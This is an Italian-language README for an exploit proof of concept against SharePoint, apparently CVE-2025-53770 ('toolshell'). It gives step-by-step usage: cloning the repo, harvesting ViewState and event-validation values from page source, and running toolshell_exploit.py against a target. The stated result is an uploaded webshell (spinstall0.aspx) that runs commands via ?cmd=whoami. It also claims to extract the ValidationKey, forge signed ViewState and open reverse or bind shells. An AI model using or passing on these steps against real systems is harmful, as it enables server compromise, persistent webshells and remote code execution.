
Exploit PoC per CVE-2025-53770 che consente il caricamento di webshell su SharePoint, estrazione della ValidationKey, generazione di ViewState firmato ed esecuzione di codice remoto tramite reverse o bind shell.
Questo pacchetto consente:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
Carica il webshell
Da una pagina di SharePoint puoi accedere al sorgente della pagina. Vai alla scheda view source e da lì, se disponibile, otterrai quanto segue, che puoi copiare:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (qualsiasi __VIEWSTATE corrente per contesto)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
Questo carica spinstall0.aspx. Controlla: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami